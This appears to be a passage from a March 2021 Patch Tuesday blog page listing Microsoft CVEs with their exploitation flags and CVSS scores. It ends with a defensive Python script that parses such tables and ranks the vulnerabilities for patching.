CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No
[CVE-2021-26875](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26875>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26873](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26873>) | Windows User Profile Service Elevation of Privilege Vulnerability | No | No | 7 | No
[CVE-2021-26899](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26899>) | Windows UPnP Device Host Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-1640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-1640>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | Yes
[CVE-2021-26878](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26878>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26862](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26862>) | Windows Installer Elevation of Privilege Vulnerability | No | No | 6.3 | No
[CVE-2021-26861](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26861>) | Windows Graphics Component Remote Code Execution Vulnerability | No | No | 7.8 | No
[CVE-2021-24107](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-24107>) | Windows Event Tracing Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-26872](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26872>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26898](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26898>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26901](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26901>) | Windows Event Tracing Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-26877](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26877>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-26893](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26893>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-26894](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26894>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-26895](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26895>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-26896](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26896>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes
[CVE-2021-27063](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27063>) | Windows DNS Server Denial of Service Vulnerability | No | No | 7.5 | Yes
[CVE-2021-26869](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26869>) | Windows ActiveX Installer Service Information Disclosure Vulnerability | No | No | 5.5 | Yes
[CVE-2021-26882](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26882>) | Remote Access API Elevation of Privilege Vulnerability | No | No | 7.8 | No
[CVE-2021-26881](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26881>) | Microsoft Windows Media Foundation Remote Code Execution Vulnerability | No | No | 7.5 | No
[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes

## Summary Graphs

ID RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53 Type rapid7blog Title Patch Tuesday - March 2021 Published 2021-03-09T22:13:03 Modified 2021-03-09T22:13:03 Href https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/ CVSS 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
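The Exploited, Disclosed and CVSS3 columns above are what a patch team actually sorts on. The following Python script is an added example, not code from the Rapid7 post or from any Microsoft tooling: it parses rows written in the same table layout (`[CVE](<url>) | Title | Exploited | Disclosed | CVSS3 | FAQ`) and ranks them for patch prioritisation. The ranking policy (in-the-wild exploitation first, then public disclosure, then CVSS, with N/A scores sorted last) and the `urgent` floor of 9.0 are assumptions, not anything the post prescribes; the sample rows are copied from the tables above.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One table row in the layout used above:
# [CVE-....](<url>) | Title | Exploited | Disclosed | CVSS3 | FAQ
ROW_RE = re.compile(
    r"^\[(?P<cve>CVE-\d{4}-\d{4,})\]\(<(?P<url>[^>]+)>\)\s*\|\s*"
    r"(?P<title>[^|]+?)\s*\|\s*(?P<exploited>Yes|No)\s*\|\s*"
    r"(?P<disclosed>Yes|No)\s*\|\s*(?P<cvss>\d+(?:\.\d+)?|N/A)\s*\|\s*"
    r"(?P<faq>Yes|No)\s*$"
)


@dataclass
class Advisory:
    cve: str
    title: str
    exploited: bool          # vendor reports exploitation observed in the wild
    disclosed: bool          # details were public before the patch shipped
    cvss: Optional[float]    # None when the table says N/A (the Chromium rows)


def parse_rows(text: str) -> List[Advisory]:
    """Return one Advisory per table row; header, separator and prose lines are skipped."""
    advisories = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # "CVE | Vulnerability Title | ...", "---|---|...", or free text
        cvss = None if m["cvss"] == "N/A" else float(m["cvss"])
        advisories.append(Advisory(
            cve=m["cve"],
            title=m["title"].strip(),
            exploited=m["exploited"] == "Yes",
            disclosed=m["disclosed"] == "Yes",
            cvss=cvss,
        ))
    return advisories


def priority(a: Advisory) -> Tuple[bool, bool, float, str]:
    """Assumed policy as a sort key: exploited first, then publicly disclosed,
    then highest CVSS. An N/A score sorts as 0.0 so it never outranks a scored bug."""
    score = a.cvss if a.cvss is not None else 0.0
    return (not a.exploited, not a.disclosed, -score, a.cve)


def triage(text: str) -> List[str]:
    """CVE IDs from the table, most urgent first."""
    return [a.cve for a in sorted(parse_rows(text), key=priority)]


def urgent(text: str, cvss_floor: float = 9.0) -> List[str]:
    """Patch-first subset: exploited, or disclosed, or CVSS at/above cvss_floor."""
    return [
        a.cve for a in sorted(parse_rows(text), key=priority)
        if a.exploited or a.disclosed or (a.cvss is not None and a.cvss >= cvss_floor)
    ]


# Constructed sample: rows copied from the tables above, plus the header and
# separator lines that the parser has to ignore.
SAMPLE = """CVE | Vulnerability Title | Exploited | Disclosed | CVSS3 | FAQ
---|---|---|---|---|---
[CVE-2021-21166](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-21166>) | Chromium CVE-2021-21166: Object lifecycle issue in audio | No | No | N/A | Yes
[CVE-2021-26411](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26411>) | Internet Explorer Memory Corruption Vulnerability | Yes | Yes | 8.8 | Yes
[CVE-2021-26412](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26412>) | Microsoft Exchange Server Remote Code Execution Vulnerability | No | No | 9.1 | No
[CVE-2021-26855](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855>) | Microsoft Exchange Server Remote Code Execution Vulnerability | Yes | No | 9.1 | Yes
[CVE-2021-26886](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26886>) | User Profile Service Denial of Service Vulnerability | No | No | 5.5 | No
[CVE-2021-26897](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26897>) | Windows DNS Server Remote Code Execution Vulnerability | No | No | 9.8 | Yes
[CVE-2021-27077](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27077>) | Windows Win32k Elevation of Privilege Vulnerability | No | Yes | 7.8 | No
"""

if __name__ == "__main__":
    for a in sorted(parse_rows(SAMPLE), key=priority):
        score = "N/A" if a.cvss is None else f"{a.cvss:.1f}"
        flag = "URGENT" if a.cve in urgent(SAMPLE) else "      "
        print(f"{flag} {a.cve}  exploited={a.exploited!s:5}  disclosed={a.disclosed!s:5}  cvss={score:>4}  {a.title}")
```

Two caveats when using this against a real table. The Exploited and Disclosed flags reflect what the publishing vendor knew at press time, so treat them as a lower bound and cross-check against the upstream project's own advisory before deciding a bug is not being exploited. And the Chromium rows carry no CVSS at all, so a score-only sort silently pushes every browser bug to the bottom; that is why the key sorts on exploitation and disclosure before it ever looks at the score.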